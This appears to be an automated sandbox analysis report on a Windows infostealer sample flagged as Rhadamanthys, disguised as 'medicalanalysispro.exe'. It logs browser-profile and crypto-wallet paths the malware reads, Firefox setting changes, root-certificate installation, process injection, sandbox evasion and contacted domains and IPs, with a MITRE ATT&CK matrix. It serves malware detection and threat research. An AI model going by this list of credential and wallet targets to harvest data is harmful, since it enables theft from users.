                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE78964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF7BDE78964
                      Source: C:\Users\user\Desktop\medicalanalysispro.exeCode function: 0_2_00007FF7BDE72C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7BDE72C54
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Overwrites Mozilla Firefox settings
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: svchost.exe, 00000007.00000002.2328734842.0000000003100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000007.00000003.2228716630.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2233485243.00000000012A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2329064094.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: svchost.exe, 00000010.00000002.2742225365.0000018B29AEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\ElectrumSV\config
                      Source: svchost.exe, 00000010.00000003.2475489229.0000018B29AD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\ElectronCash\config
                      Source: svchost.exe, 00000010.00000003.2475489229.0000018B29AD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\com.liberty.jaxx
                      Source: svchost.exe, 00000010.00000003.2736460125.0000018B29AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                      Source: svchost.exe, 00000010.00000003.2736460125.0000018B29AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus
                      Source: svchost.exe, 00000010.00000003.2736460125.0000018B29AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
                      Source: medicalanalysis.exeString found in binary or memory: set_UseMachineKeyStore
                      Source: svchost.exe, 00000010.00000002.2741456674.0000018B2945B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsingJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomedJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browserJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnailsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entriesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\mainJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2128, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000007.00000003.2228716630.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2233485243.00000000012A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2329064094.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\svchost.exeCode function: 16_3_00007DF4AE6059B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,16_3_00007DF4AE6059B0
                      Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 21_2_00000242C8C0D004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,21_2_00000242C8C0D004

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts2
                      Native API                      		1
                      Create Account                      		1
                      Extra Window Memory Injection                      		2
                      Obfuscated Files or Information                      		21
                      Input Capture                      		13
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Browser Session Hijacking                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Access Token Manipulation                      		1
                      Install Root Certificate                      		Security Account Manager117
                      System Information Discovery                      		SMB/Windows Admin Shares21
                      Data from Local System                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      Registry Run Keys / Startup Folder                      		312
                      Process Injection                      		1
                      Software Packing                      		NTDS1
                      Query Registry                      		Distributed Component Object Model21
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Scheduled Task/Job                      		1
                      Timestomp                      		LSA Secrets331
                      Security Software Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		Cached Domain Credentials41
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Extra Window Memory Injection                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Masquerading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                      Process Injection                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                      Rundll32                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579551 Sample: medicalanalysispro.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 100 61 x.ns.gin.ntt.net 2->61 63 time.windows.com 2->63 65 6 other IPs or domains 2->65 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 8 other signatures 2->97 12 medicalanalysispro.exe 1 4 2->12         started        15 rundll32.exe 2->15         started        signatures3 process4 file5 53 C:\Users\user\...\medicallanalysis.exe, PE32 12->53 dropped 55 C:\Users\user\AppData\...\medicalanalysis.exe, PE32 12->55 dropped 17 medicalanalysis.exe 15 2 12->17         started        21 medicallanalysis.exe 1 4 12->21         started        process6 dnsIp7 59 erdogansigorta.com 5.2.81.126, 443, 49730 ALASTYRTR Turkey 17->59 77 Multi AV Scanner detection for dropped file 17->77 79 Machine Learning detection for dropped file 17->79 81 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->81 89 2 other signatures 17->89 24 InstallUtil.exe 1 17->24         started        51 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 21->51 dropped 83 Installs new ROOT certificates 21->83 85 Overwrites Mozilla Firefox settings 21->85 87 Tries to harvest and steal browser information (history, passwords, etc) 21->87 27 cmd.exe 1 21->27         started        file8 signatures9 process10 signatures11 99 Switches to a custom stack to bypass stack traces 24->99 29 svchost.exe 24->29         started        33 WerFault.exe 4 24->33         started        35 conhost.exe 27->35         started        37 timeout.exe 1 27->37         started        process12 dnsIp13 75 104.37.175.218, 49738, 49802, 49831 MAJESTIC-HOSTING-01US United States 29->75 105 System process connects to network (likely due to code injection or exploit) 29->105 107 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->107 109 Switches to a custom stack to bypass stack traces 29->109 39 svchost.exe 3 29->39         started        signatures14 process15 dnsIp16 67 time-a-g.nist.gov 129.6.15.28, 123, 63237 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 39->67 69 x.ns.gin.ntt.net 129.250.35.250, 123, 63237 NTT-COMMUNICATIONS-2914US United States 39->69 71 3 other IPs or domains 39->71 101 Found many strings related to Crypto-Wallets (likely being stolen) 39->101 103 Tries to harvest and steal browser information (history, passwords, etc) 39->103 43 chrome.exe 39->43         started        46 wmprph.exe 39->46         started        signatures17 process18 dnsIp19 73 239.255.255.250 unknown Reserved 43->73 48 chrome.exe 43->48         started        process20 dnsIp21 57 127.0.0.1 unknown unknown 48->57

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      medicalanalysispro.exe21%VirustotalBrowse
                      medicalanalysispro.exe53%ReversingLabsWin64.Trojan.Sonbokli
                      medicalanalysispro.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe61%ReversingLabsByteCode-MSIL.Trojan.Zilla
                      C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe8%ReversingLabsByteCode-MSIL.Trojan.Zilla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gbg1.ntp.netnod.se
                      		194.58.203.20
                      		truefalse
                        		unknown
                        x.ns.gin.ntt.net
                        		129.250.35.250
                        		truefalse
                          		high
                          time.google.com
                          		216.239.35.4
                          		truefalse
                            		high
                            erdogansigorta.com
                            		5.2.81.126
                            		truefalse
                              		unknown
                              time-a-g.nist.gov
                              		129.6.15.28
                              		truefalse
                                		high
                                time.facebook.com
                                		129.134.25.123
                                		truefalse
                                  		high
                                  gbg1.ntp.se
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    time.windows.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
